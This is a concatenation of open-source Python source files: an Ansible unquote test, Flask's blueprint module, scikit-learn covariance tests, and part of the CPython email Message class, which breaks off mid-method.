# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from nose import tools
from ansible.compat.tests import unittest
from ansible.parsing.splitter import unquote
# Tests using nose's test generators cannot use unittest base class.
# http://nose.readthedocs.org/en/latest/writing_tests.html#test-generators
class TestUnquote:
UNQUOTE_DATA = (
(u'1', u'1'),
(u'\'1\'', u'1'),
(u'"1"', u'1'),
(u'"1 \'2\'"', u'1 \'2\''),
(u'\'1 "2"\'', u'1 "2"'),
(u'\'1 \'2\'\'', u'1 \'2\''),
(u'"1\\"', u'"1\\"'),
(u'\'1\\\'', u'\'1\\\''),
(u'"1 \\"2\\" 3"', u'1 \\"2\\" 3'),
(u'\'1 \\\'2\\\' 3\'', u'1 \\\'2\\\' 3'),
(u'"', u'"'),
(u'\'', u'\''),
# Not entirely sure these are good but they match the current
# behaviour
(u'"1""2"', u'1""2'),
(u'\'1\'\'2\'', u'1\'\'2'),
(u'"1" 2 "3"', u'1" 2 "3'),
(u'"1"\'2\'"3"', u'1"\'2\'"3'),
)
def check_unquote(self, quoted, expected):
tools.eq_(unquote(quoted), expected)
def test_unquote(self):
for datapoint in self.UNQUOTE_DATA:
yield self.check_unquote, datapoint[0], datapoint[1]
|
jorpramo/flask | refs/heads/master | flask/blueprints.py | 141 | # -*- coding: utf-8 -*-
"""
flask.blueprints
~~~~~~~~~~~~~~~~
Blueprints are the recommended way to implement larger or more
pluggable applications in Flask 0.7 and later.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from functools import update_wrapper
from .helpers import _PackageBoundObject, _endpoint_from_view_func
class BlueprintSetupState(object):
"""Temporary holder object for registering a blueprint with the
application. An instance of this class is created by the
:meth:`~flask.Blueprint.make_setup_state` method and later passed
to all register callback functions.
"""
def __init__(self, blueprint, app, options, first_registration):
#: a reference to the current application
self.app = app
#: a reference to the blueprint that created this setup state.
self.blueprint = blueprint
#: a dictionary with all options that were passed to the
#: :meth:`~flask.Flask.register_blueprint` method.
self.options = options
#: as blueprints can be registered multiple times with the
#: application and not everything wants to be registered
#: multiple times on it, this attribute can be used to figure
#: out if the blueprint was registered in the past already.
self.first_registration = first_registration
subdomain = self.options.get('subdomain')
if subdomain is None:
subdomain = self.blueprint.subdomain
#: The subdomain that the blueprint should be active for, ``None``
#: otherwise.
self.subdomain = subdomain
url_prefix = self.options.get('url_prefix')
if url_prefix is None:
url_prefix = self.blueprint.url_prefix
#: The prefix that should be used for all URLs defined on the
#: blueprint.
self.url_prefix = url_prefix
#: A dictionary with URL defaults that is added to each and every
#: URL that was defined with the blueprint.
self.url_defaults = dict(self.blueprint.url_values_defaults)
self.url_defaults.update(self.options.get('url_defaults', ()))
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""A helper method to register a rule (and optionally a view function)
to the application. The endpoint is automatically prefixed with the
blueprint's name.
"""
if self.url_prefix:
rule = self.url_prefix + rule
options.setdefault('subdomain', self.subdomain)
if endpoint is None:
endpoint = _endpoint_from_view_func(view_func)
defaults = self.url_defaults
if 'defaults' in options:
defaults = dict(defaults, **options.pop('defaults'))
self.app.add_url_rule(rule, '%s.%s' % (self.blueprint.name, endpoint),
view_func, defaults=defaults, **options)
class Blueprint(_PackageBoundObject):
"""Represents a blueprint. A blueprint is an object that records
functions that will be called with the
:class:`~flask.blueprints.BlueprintSetupState` later to register functions
or other things on the main application. See :ref:`blueprints` for more
information.
.. versionadded:: 0.7
"""
warn_on_modifications = False
_got_registered_once = False
def __init__(self, name, import_name, static_folder=None,
static_url_path=None, template_folder=None,
url_prefix=None, subdomain=None, url_defaults=None,
root_path=None):
_PackageBoundObject.__init__(self, import_name, template_folder,
root_path=root_path)
self.name = name
self.url_prefix = url_prefix
self.subdomain = subdomain
self.static_folder = static_folder
self.static_url_path = static_url_path
self.deferred_functions = []
if url_defaults is None:
url_defaults = {}
self.url_values_defaults = url_defaults
def record(self, func):
"""Registers a function that is called when the blueprint is
registered on the application. This function is called with the
state as argument as returned by the :meth:`make_setup_state`
method.
"""
if self._got_registered_once and self.warn_on_modifications:
from warnings import warn
warn(Warning('The blueprint was already registered once '
'but is getting modified now. These changes '
'will not show up.'))
self.deferred_functions.append(func)
def record_once(self, func):
"""Works like :meth:`record` but wraps the function in another
function that will ensure the function is only called once. If the
blueprint is registered a second time on the application, the
function passed is not called.
"""
def wrapper(state):
if state.first_registration:
func(state)
return self.record(update_wrapper(wrapper, func))
def make_setup_state(self, app, options, first_registration=False):
"""Creates an instance of :meth:`~flask.blueprints.BlueprintSetupState`
object that is later passed to the register callback functions.
Subclasses can override this to return a subclass of the setup state.
"""
return BlueprintSetupState(self, app, options, first_registration)
def register(self, app, options, first_registration=False):
"""Called by :meth:`Flask.register_blueprint` to register a blueprint
on the application. This can be overridden to customize the register
behavior. Keyword arguments from
:func:`~flask.Flask.register_blueprint` are directly forwarded to this
method in the `options` dictionary.
"""
self._got_registered_once = True
state = self.make_setup_state(app, options, first_registration)
if self.has_static_folder:
state.add_url_rule(self.static_url_path + '/<path:filename>',
view_func=self.send_static_file,
endpoint='static')
for deferred in self.deferred_functions:
deferred(state)
def route(self, rule, **options):
"""Like :meth:`Flask.route` but for a blueprint. The endpoint for the
:func:`url_for` function is prefixed with the name of the blueprint.
"""
def decorator(f):
endpoint = options.pop("endpoint", f.__name__)
self.add_url_rule(rule, endpoint, f, **options)
return f
return decorator
def add_url_rule(self, rule, endpoint=None, view_func=None, **options):
"""Like :meth:`Flask.add_url_rule` but for a blueprint. The endpoint for
the :func:`url_for` function is prefixed with the name of the blueprint.
"""
if endpoint:
assert '.' not in endpoint, "Blueprint endpoints should not contain dots"
self.record(lambda s:
s.add_url_rule(rule, endpoint, view_func, **options))
def endpoint(self, endpoint):
"""Like :meth:`Flask.endpoint` but for a blueprint. This does not
prefix the endpoint with the blueprint name, this has to be done
explicitly by the user of this method. If the endpoint is prefixed
with a `.` it will be registered to the current blueprint, otherwise
it's an application independent endpoint.
"""
def decorator(f):
def register_endpoint(state):
state.app.view_functions[endpoint] = f
self.record_once(register_endpoint)
return f
return decorator
def app_template_filter(self, name=None):
"""Register a custom template filter, available application wide. Like
:meth:`Flask.template_filter` but for a blueprint.
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
def decorator(f):
self.add_app_template_filter(f, name=name)
return f
return decorator
def add_app_template_filter(self, f, name=None):
"""Register a custom template filter, available application wide. Like
:meth:`Flask.add_template_filter` but for a blueprint. Works exactly
like the :meth:`app_template_filter` decorator.
:param name: the optional name of the filter, otherwise the
function name will be used.
"""
def register_template(state):
state.app.jinja_env.filters[name or f.__name__] = f
self.record_once(register_template)
def app_template_test(self, name=None):
"""Register a custom template test, available application wide. Like
:meth:`Flask.template_test` but for a blueprint.
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
def decorator(f):
self.add_app_template_test(f, name=name)
return f
return decorator
def add_app_template_test(self, f, name=None):
"""Register a custom template test, available application wide. Like
:meth:`Flask.add_template_test` but for a blueprint. Works exactly
like the :meth:`app_template_test` decorator.
.. versionadded:: 0.10
:param name: the optional name of the test, otherwise the
function name will be used.
"""
def register_template(state):
state.app.jinja_env.tests[name or f.__name__] = f
self.record_once(register_template)
def app_template_global(self, name=None):
"""Register a custom template global, available application wide. Like
:meth:`Flask.template_global` but for a blueprint.
.. versionadded:: 0.10
:param name: the optional name of the global, otherwise the
function name will be used.
"""
def decorator(f):
self.add_app_template_global(f, name=name)
return f
return decorator
def add_app_template_global(self, f, name=None):
"""Register a custom template global, available application wide. Like
:meth:`Flask.add_template_global` but for a blueprint. Works exactly
like the :meth:`app_template_global` decorator.
.. versionadded:: 0.10
:param name: the optional name of the global, otherwise the
function name will be used.
"""
def register_template(state):
state.app.jinja_env.globals[name or f.__name__] = f
self.record_once(register_template)
def before_request(self, f):
"""Like :meth:`Flask.before_request` but for a blueprint. This function
is only executed before each request that is handled by a function of
that blueprint.
"""
self.record_once(lambda s: s.app.before_request_funcs
.setdefault(self.name, []).append(f))
return f
def before_app_request(self, f):
"""Like :meth:`Flask.before_request`. Such a function is executed
before each request, even if outside of a blueprint.
"""
self.record_once(lambda s: s.app.before_request_funcs
.setdefault(None, []).append(f))
return f
def before_app_first_request(self, f):
"""Like :meth:`Flask.before_first_request`. Such a function is
executed before the first request to the application.
"""
self.record_once(lambda s: s.app.before_first_request_funcs.append(f))
return f
def after_request(self, f):
"""Like :meth:`Flask.after_request` but for a blueprint. This function
is only executed after each request that is handled by a function of
that blueprint.
"""
self.record_once(lambda s: s.app.after_request_funcs
.setdefault(self.name, []).append(f))
return f
def after_app_request(self, f):
"""Like :meth:`Flask.after_request` but for a blueprint. Such a function
is executed after each request, even if outside of the blueprint.
"""
self.record_once(lambda s: s.app.after_request_funcs
.setdefault(None, []).append(f))
return f
def teardown_request(self, f):
"""Like :meth:`Flask.teardown_request` but for a blueprint. This
function is only executed when tearing down requests handled by a
function of that blueprint. Teardown request functions are executed
when the request context is popped, even when no actual request was
performed.
"""
self.record_once(lambda s: s.app.teardown_request_funcs
.setdefault(self.name, []).append(f))
return f
def teardown_app_request(self, f):
"""Like :meth:`Flask.teardown_request` but for a blueprint. Such a
function is executed when tearing down each request, even if outside of
the blueprint.
"""
self.record_once(lambda s: s.app.teardown_request_funcs
.setdefault(None, []).append(f))
return f
def context_processor(self, f):
"""Like :meth:`Flask.context_processor` but for a blueprint. This
function is only executed for requests handled by a blueprint.
"""
self.record_once(lambda s: s.app.template_context_processors
.setdefault(self.name, []).append(f))
return f
def app_context_processor(self, f):
"""Like :meth:`Flask.context_processor` but for a blueprint. Such a
function is executed each request, even if outside of the blueprint.
"""
self.record_once(lambda s: s.app.template_context_processors
.setdefault(None, []).append(f))
return f
def app_errorhandler(self, code):
"""Like :meth:`Flask.errorhandler` but for a blueprint. This
handler is used for all requests, even if outside of the blueprint.
"""
def decorator(f):
self.record_once(lambda s: s.app.errorhandler(code)(f))
return f
return decorator
def url_value_preprocessor(self, f):
"""Registers a function as URL value preprocessor for this
blueprint. It's called before the view functions are called and
can modify the url values provided.
"""
self.record_once(lambda s: s.app.url_value_preprocessors
.setdefault(self.name, []).append(f))
return f
def url_defaults(self, f):
"""Callback function for URL defaults for this blueprint. It's called
with the endpoint and values and should update the values passed
in place.
"""
self.record_once(lambda s: s.app.url_default_functions
.setdefault(self.name, []).append(f))
return f
def app_url_value_preprocessor(self, f):
"""Same as :meth:`url_value_preprocessor` but application wide.
"""
self.record_once(lambda s: s.app.url_value_preprocessors
.setdefault(None, []).append(f))
return f
def app_url_defaults(self, f):
"""Same as :meth:`url_defaults` but application wide.
"""
self.record_once(lambda s: s.app.url_default_functions
.setdefault(None, []).append(f))
return f
def errorhandler(self, code_or_exception):
"""Registers an error handler that becomes active for this blueprint
only. Please be aware that routing does not happen local to a
blueprint so an error handler for 404 usually is not handled by
a blueprint unless it is caused inside a view function. Another
special case is the 500 internal server error which is always looked
up from the application.
Otherwise works as the :meth:`~flask.Flask.errorhandler` decorator
of the :class:`~flask.Flask` object.
"""
def decorator(f):
self.record_once(lambda s: s.app._register_error_handler(
self.name, code_or_exception, f))
return f
return decorator
def register_error_handler(self, code_or_exception, f):
"""Non-decorator version of the :meth:`errorhandler` error attach
function, akin to the :meth:`~flask.Flask.register_error_handler`
application-wide function of the :class:`~flask.Flask` object but
for error handlers limited to this blueprint.
.. versionadded:: 1.0
"""
self.record_once(lambda s: s.app._register_error_handler(
self.name, code_or_exception, f))
|
mwv/scikit-learn | refs/heads/master | sklearn/covariance/tests/test_covariance.py | 142 | # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Virgile Fritsch <virgile.fritsch@inria.fr>
#
# License: BSD 3 clause
import numpy as np
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_warns
from sklearn import datasets
from sklearn.covariance import empirical_covariance, EmpiricalCovariance, \
ShrunkCovariance, shrunk_covariance, \
LedoitWolf, ledoit_wolf, ledoit_wolf_shrinkage, OAS, oas
X = datasets.load_diabetes().data
X_1d = X[:, 0]
n_samples, n_features = X.shape
def test_covariance():
# Tests Covariance module on a simple dataset.
# test covariance fit from data
cov = EmpiricalCovariance()
cov.fit(X)
emp_cov = empirical_covariance(X)
assert_array_almost_equal(emp_cov, cov.covariance_, 4)
assert_almost_equal(cov.error_norm(emp_cov), 0)
assert_almost_equal(
cov.error_norm(emp_cov, norm='spectral'), 0)
assert_almost_equal(
cov.error_norm(emp_cov, norm='frobenius'), 0)
assert_almost_equal(
cov.error_norm(emp_cov, scaling=False), 0)
assert_almost_equal(
cov.error_norm(emp_cov, squared=False), 0)
assert_raises(NotImplementedError,
cov.error_norm, emp_cov, norm='foo')
# Mahalanobis distances computation test
mahal_dist = cov.mahalanobis(X)
print(np.amin(mahal_dist), np.amax(mahal_dist))
assert(np.amin(mahal_dist) > 0)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
cov = EmpiricalCovariance()
cov.fit(X_1d)
assert_array_almost_equal(empirical_covariance(X_1d), cov.covariance_, 4)
assert_almost_equal(cov.error_norm(empirical_covariance(X_1d)), 0)
assert_almost_equal(
cov.error_norm(empirical_covariance(X_1d), norm='spectral'), 0)
# test with one sample
# FIXME I don't know what this test does
X_1sample = np.arange(5)
cov = EmpiricalCovariance()
assert_warns(UserWarning, cov.fit, X_1sample)
assert_array_almost_equal(cov.covariance_,
np.zeros(shape=(5, 5), dtype=np.float64))
# test integer type
X_integer = np.asarray([[0, 1], [1, 0]])
result = np.asarray([[0.25, -0.25], [-0.25, 0.25]])
assert_array_almost_equal(empirical_covariance(X_integer), result)
# test centered case
cov = EmpiricalCovariance(assume_centered=True)
cov.fit(X)
assert_array_equal(cov.location_, np.zeros(X.shape[1]))
def test_shrunk_covariance():
# Tests ShrunkCovariance module on a simple dataset.
# compare shrunk covariance obtained from data and from MLE estimate
cov = ShrunkCovariance(shrinkage=0.5)
cov.fit(X)
assert_array_almost_equal(
shrunk_covariance(empirical_covariance(X), shrinkage=0.5),
cov.covariance_, 4)
# same test with shrinkage not provided
cov = ShrunkCovariance()
cov.fit(X)
assert_array_almost_equal(
shrunk_covariance(empirical_covariance(X)), cov.covariance_, 4)
# same test with shrinkage = 0 (<==> empirical_covariance)
cov = ShrunkCovariance(shrinkage=0.)
cov.fit(X)
assert_array_almost_equal(empirical_covariance(X), cov.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
cov = ShrunkCovariance(shrinkage=0.3)
cov.fit(X_1d)
assert_array_almost_equal(empirical_covariance(X_1d), cov.covariance_, 4)
# test shrinkage coeff on a simple data set (without saving precision)
cov = ShrunkCovariance(shrinkage=0.5, store_precision=False)
cov.fit(X)
assert(cov.precision_ is None)
def test_ledoit_wolf():
# Tests LedoitWolf module on a simple dataset.
# test shrinkage coeff on a simple data set
X_centered = X - X.mean(axis=0)
lw = LedoitWolf(assume_centered=True)
lw.fit(X_centered)
shrinkage_ = lw.shrinkage_
score_ = lw.score(X_centered)
assert_almost_equal(ledoit_wolf_shrinkage(X_centered,
assume_centered=True),
shrinkage_)
assert_almost_equal(ledoit_wolf_shrinkage(X_centered, assume_centered=True,
block_size=6),
shrinkage_)
# compare shrunk covariance obtained from data and from MLE estimate
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X_centered,
assume_centered=True)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
# compare estimates given by LW and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=lw.shrinkage_, assume_centered=True)
scov.fit(X_centered)
assert_array_almost_equal(scov.covariance_, lw.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
lw = LedoitWolf(assume_centered=True)
lw.fit(X_1d)
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X_1d,
assume_centered=True)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
assert_array_almost_equal((X_1d ** 2).sum() / n_samples, lw.covariance_, 4)
# test shrinkage coeff on a simple data set (without saving precision)
lw = LedoitWolf(store_precision=False, assume_centered=True)
lw.fit(X_centered)
assert_almost_equal(lw.score(X_centered), score_, 4)
assert(lw.precision_ is None)
# Same tests without assuming centered data
# test shrinkage coeff on a simple data set
lw = LedoitWolf()
lw.fit(X)
assert_almost_equal(lw.shrinkage_, shrinkage_, 4)
assert_almost_equal(lw.shrinkage_, ledoit_wolf_shrinkage(X))
assert_almost_equal(lw.shrinkage_, ledoit_wolf(X)[1])
assert_almost_equal(lw.score(X), score_, 4)
# compare shrunk covariance obtained from data and from MLE estimate
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
# compare estimates given by LW and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=lw.shrinkage_)
scov.fit(X)
assert_array_almost_equal(scov.covariance_, lw.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
lw = LedoitWolf()
lw.fit(X_1d)
lw_cov_from_mle, lw_shinkrage_from_mle = ledoit_wolf(X_1d)
assert_array_almost_equal(lw_cov_from_mle, lw.covariance_, 4)
assert_almost_equal(lw_shinkrage_from_mle, lw.shrinkage_)
assert_array_almost_equal(empirical_covariance(X_1d), lw.covariance_, 4)
# test with one sample
# FIXME I don't know what this test does
X_1sample = np.arange(5)
lw = LedoitWolf()
assert_warns(UserWarning, lw.fit, X_1sample)
assert_array_almost_equal(lw.covariance_,
np.zeros(shape=(5, 5), dtype=np.float64))
# test shrinkage coeff on a simple data set (without saving precision)
lw = LedoitWolf(store_precision=False)
lw.fit(X)
assert_almost_equal(lw.score(X), score_, 4)
assert(lw.precision_ is None)
def test_ledoit_wolf_large():
# test that ledoit_wolf doesn't error on data that is wider than block_size
rng = np.random.RandomState(0)
# use a number of features that is larger than the block-size
X = rng.normal(size=(10, 20))
lw = LedoitWolf(block_size=10).fit(X)
# check that covariance is about diagonal (random normal noise)
assert_almost_equal(lw.covariance_, np.eye(20), 0)
cov = lw.covariance_
# check that the result is consistent with not splitting data into blocks.
lw = LedoitWolf(block_size=25).fit(X)
assert_almost_equal(lw.covariance_, cov)
def test_oas():
# Tests OAS module on a simple dataset.
# test shrinkage coeff on a simple data set
X_centered = X - X.mean(axis=0)
oa = OAS(assume_centered=True)
oa.fit(X_centered)
shrinkage_ = oa.shrinkage_
score_ = oa.score(X_centered)
# compare shrunk covariance obtained from data and from MLE estimate
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X_centered,
assume_centered=True)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
# compare estimates given by OAS and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=oa.shrinkage_, assume_centered=True)
scov.fit(X_centered)
assert_array_almost_equal(scov.covariance_, oa.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
oa = OAS(assume_centered=True)
oa.fit(X_1d)
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X_1d, assume_centered=True)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
assert_array_almost_equal((X_1d ** 2).sum() / n_samples, oa.covariance_, 4)
# test shrinkage coeff on a simple data set (without saving precision)
oa = OAS(store_precision=False, assume_centered=True)
oa.fit(X_centered)
assert_almost_equal(oa.score(X_centered), score_, 4)
assert(oa.precision_ is None)
# Same tests without assuming centered data--------------------------------
# test shrinkage coeff on a simple data set
oa = OAS()
oa.fit(X)
assert_almost_equal(oa.shrinkage_, shrinkage_, 4)
assert_almost_equal(oa.score(X), score_, 4)
# compare shrunk covariance obtained from data and from MLE estimate
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
# compare estimates given by OAS and ShrunkCovariance
scov = ShrunkCovariance(shrinkage=oa.shrinkage_)
scov.fit(X)
assert_array_almost_equal(scov.covariance_, oa.covariance_, 4)
# test with n_features = 1
X_1d = X[:, 0].reshape((-1, 1))
oa = OAS()
oa.fit(X_1d)
oa_cov_from_mle, oa_shinkrage_from_mle = oas(X_1d)
assert_array_almost_equal(oa_cov_from_mle, oa.covariance_, 4)
assert_almost_equal(oa_shinkrage_from_mle, oa.shrinkage_)
assert_array_almost_equal(empirical_covariance(X_1d), oa.covariance_, 4)
# test with one sample
# FIXME I don't know what this test does
X_1sample = np.arange(5)
oa = OAS()
assert_warns(UserWarning, oa.fit, X_1sample)
assert_array_almost_equal(oa.covariance_,
np.zeros(shape=(5, 5), dtype=np.float64))
# test shrinkage coeff on a simple data set (without saving precision)
oa = OAS(store_precision=False)
oa.fit(X)
assert_almost_equal(oa.score(X), score_, 4)
assert(oa.precision_ is None)
|
maohongyuan/kbengine | refs/heads/master | kbe/src/lib/python/Lib/email/message.py | 63 | # Copyright (C) 2001-2007 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org
"""Basic message object for the email package object model."""
__all__ = ['Message']
import re
import uu
import quopri
import warnings
from io import BytesIO, StringIO
# Intrapackage imports
from email import utils
from email import errors
from email._policybase import compat32
from email import charset as _charset
from email._encoded_words import decode_b
Charset = _charset.Charset
SEMISPACE = '; '
# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
def _splitparam(param):
# Split header parameters. BAW: this may be too simple. It isn't
# strictly RFC 2045 (section 5.1) compliant, but it catches most headers
# found in the wild. We may eventually need a full fledged parser.
# RDM: we might have a Header here; for now just stringify it.
a, sep, b = str(param).partition(';')
if not sep:
return a.strip(), None
return a.strip(), b.strip()
def _formatparam(param, value=None, quote=True):
"""Convenience function to format and return a key=value pair.
This will quote the value if needed or if quote is true. If value is a
three tuple (charset, language, value), it will be encoded according
to RFC2231 rules. If it contains non-ascii characters it will likewise
be encoded according to RFC2231 rules, using the utf-8 charset and
a null language.
"""
if value is not None and len(value) > 0:
# A tuple is used for RFC 2231 encoded parameter values where items
# are (charset, language, value). charset is a string, not a Charset
# instance. RFC 2231 encoded values are never quoted, per RFC.
if isinstance(value, tuple):
# Encode as per RFC 2231
param += '*'
value = utils.encode_rfc2231(value[2], value[0], value[1])
return '%s=%s' % (param, value)
else:
try:
value.encode('ascii')
except UnicodeEncodeError:
param += '*'
value = utils.encode_rfc2231(value, 'utf-8', '')
return '%s=%s' % (param, value)
# BAW: Please check this. I think that if quote is set it should
# force quoting even if not necessary.
if quote or tspecials.search(value):
return '%s="%s"' % (param, utils.quote(value))
else:
return '%s=%s' % (param, value)
else:
return param
def _parseparam(s):
# RDM This might be a Header, so for now stringify it.
s = ';' + str(s)
plist = []
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and (s.count('"', 0, end) - s.count('\\"', 0, end)) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
if '=' in f:
i = f.index('=')
f = f[:i].strip().lower() + '=' + f[i+1:].strip()
plist.append(f.strip())
s = s[end:]
return plist
def _unquotevalue(value):
# This is different than utils.collapse_rfc2231_value() because it doesn't
# try to convert the value to a unicode. Message.get_param() and
# Message.get_params() are both currently defined to return the tuple in
# the face of RFC 2231 parameters.
if isinstance(value, tuple):
return value[0], value[1], utils.unquote(value[2])
else:
return utils.unquote(value)
class Message:
"""Basic message object.
A message object is defined as something that has a bunch of RFC 2822
headers and a payload. It may optionally have an envelope header
(a.k.a. Unix-From or From_ header). If the message is a container (i.e. a
multipart or a message/rfc822), then the payload is a list of Message
objects, otherwise it is a string.
Message objects implement part of the `mapping' interface, which assumes
there is exactly one occurrence of the header per message. Some headers
do in fact appear multiple times (e.g. Received) and for those headers,
you must use the explicit API to set or get all the headers. Not all of
the mapping methods are implemented.
"""
def __init__(self, policy=compat32):
self.policy = policy
self._headers = []
self._unixfrom = None
self._payload = None
self._charset = None
# Defaults for multipart messages
self.preamble = self.epilogue = None
self.defects = []
# Default content type
self._default_type = 'text/plain'
def __str__(self):
"""Return the entire formatted message as a string.
"""
return self.as_string()
def as_string(self, unixfrom=False, maxheaderlen=0, policy=None):
"""Return the entire formatted message as a string.
Optional 'unixfrom', when true, means include the Unix From_ envelope
header. For backward compatibility reasons, if maxheaderlen is
not specified it defaults to 0, so you must override it explicitly
if you want a different maxheaderlen. 'policy' is passed to the
Generator instance used to serialize the mesasge; if it is not
specified the policy associated with the message instance is used.
If the message object contains binary data that is not encoded
according to RFC standards, the non-compliant data will be replaced by
unicode "unknown character" code points.
"""
from email.generator import Generator
policy = self.policy if policy is None else policy
fp = StringIO()
g = Generator(fp,
mangle_from_=False,
maxheaderlen=maxheaderlen,
policy=policy)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
def __bytes__(self):
"""Return the entire formatted message as a bytes object.
"""
return self.as_bytes()
def as_bytes(self, unixfrom=False, policy=None):
"""Return the entire formatted message as a bytes object.
Optional 'unixfrom', when true, means include the Unix From_ envelope
header. 'policy' is passed to the BytesGenerator instance used to
serialize the message; if not specified the policy associated with
the message instance is used.
"""
from email.generator import BytesGenerator
policy = self.policy if policy is None else policy
fp = BytesIO()
g = BytesGenerator(fp, mangle_from_=False, policy=policy)
g.flatten(self, unixfrom=unixfrom)
return fp.getvalue()
def is_multipart(self):
"""Return True if the message consists of multiple parts."""
return isinstance(self._payload, list)
#
# Unix From_ line
#
def set_unixfrom(self, unixfrom):
self._unixfrom = unixfrom
def get_unixfrom(self):
return self._unixfrom
#
# Payload manipulation.
#
def attach(self, payload):
"""Add the given payload to the current payload.
The current payload will always be a list of objects after this method
is called. If you want to set the payload to a scalar object, use
set_payload() instead.
"""
if self._payload is None:
self._payload = [payload]
else:
try:
self._payload.append(payload)
except AttributeError:
raise TypeError("Attach is not valid on a message with a"
" non-multipart payload")
def get_payload(self, i=None, decode=False):
"""Return a reference to the payload.
The payload will either be a list object or a string. If you mutate
the list object, you modify the message's payload in place. Optional
i returns that index into the payload.
Optional decode is a flag indicating whether the payload should be
decoded or not, according to the Content-Transfer-Encoding header
(default is False).
When True and the message is not a multipart, the payload will be
decoded if this header's value is `quoted-printable' or `base64'. If
some other encoding is used, or the header is missing, or if the
payload has bogus data (i.e. bogus base64 or uuencoded data), the
payload is returned as-is.
If the message is a multipart and the decode flag is True, then None
is returned.
"""
# Here is the logic table for this code, based on the email5.0.0 code:
# i decode is_multipart result
# ------ ------ ------------ ------------------------------
# None True True None
# i True True None
# None False True _payload (a list)
# i False True _payload element i (a Message)
# i False False error (not a list)
# i True False error (not a list)
# None False False _payload
# None True False _payload decoded (bytes)
# Note that Barry planned to factor out the 'decode' case, but that
# isn't so easy now that we handle the 8 bit data, which needs to be
# converted in both the decode and non-decode path.
if self.is_multipart():
if decode:
return None
if i is None:
return self._payload
else:
return self._payload[i]
# For backward compatibility, Use isinstance and this error message
# instead of the more logical is_multipart test.
if i is not None and not isinstance(self._payload, list):
raise TypeError('Expected list, got %s' % type(self._payload))
payload = self._payload
# cte might be a Header, so for now stringify it.
cte = str(self.get('content-transfer-encoding', '')).lower()
# payload may be bytes here.
if isinstance(payload, str):
if utils._has_surrogates(payload):
bpayload = payload.encode('ascii', 'surrogateescape')
if not decode:
try:
payload = bpayload.decode(self.get_param('charset', 'ascii'), 'replace')
except LookupError:
payload = bpayload.decode('ascii', 'replace')
elif decode:
try:
bpayload = payload.encode('ascii')
except UnicodeError:
# This won't happen for RFC compliant messages (messages
# containing only ASCII codepoints in the unicode input).
# If it does happen, turn the string into bytes in a way
# guaranteed not to fail.
bpayload = payload.encode('raw-unicode-escape')
if not decode:
return payload
if cte == 'quoted-printable':
return quopri.decodestring(bpayload)
elif cte == 'base64':
# XXX: this is a bit of a hack; decode_b should probably be factored
# out somewhere, but I haven't figured out where yet.
value, defects = decode_b(b''.join(bpayload.splitlines()))
for defect in defects:
self.policy.handle_defect(self, defect)
return value
elif cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
in_file = BytesIO(bpayload)
out_file = BytesIO()
try:
uu.decode(in_file, out_file, quiet=True)
return out_file.getvalue()
except uu.Error:
# Some decoding problem
return bpayload
if isinstance(payload, str):
return bpayload
return payload
def set_payload(self, payload, charset=None):
"""Set the payload to the given value.
Optional charset sets the message's default character set. See
set_charset() for details.
"""
if hasattr(payload, 'encode'):
if charset is None:
self._payload = payload
return
if not isinstance(charset, Charset):
charset = Charset(charset)
payload = payload.encode(charset.output_charset)
if hasattr(payload, 'decode'):
self._payload = payload.decode('ascii', 'surrogateescape')
else:
self._payload = payload
if charset is not None:
self.set_charset(charset)
def set_charset(self, charset):
"""Set the charset of the payload to a given character set.
charset can be a Charset instance, a string naming a character set, or
None. If it is a string it will be converted to a Charset instance.
If charset is None, the charset parameter will be removed from the
Content-Type field. Anything else will generate a TypeError.
The message will be assumed to be of type text/* encoded with
charset.input_charset. It will be converted to charset.output_charset
and encoded properly, if needed, when generating the plain text
representation of the message. MIME headers (MIME-Version,
Content-Type, Content-Transfer-Encoding) will be added as needed.
"""
if charset is None:
self.del_param('charset')
self._charset = None
return
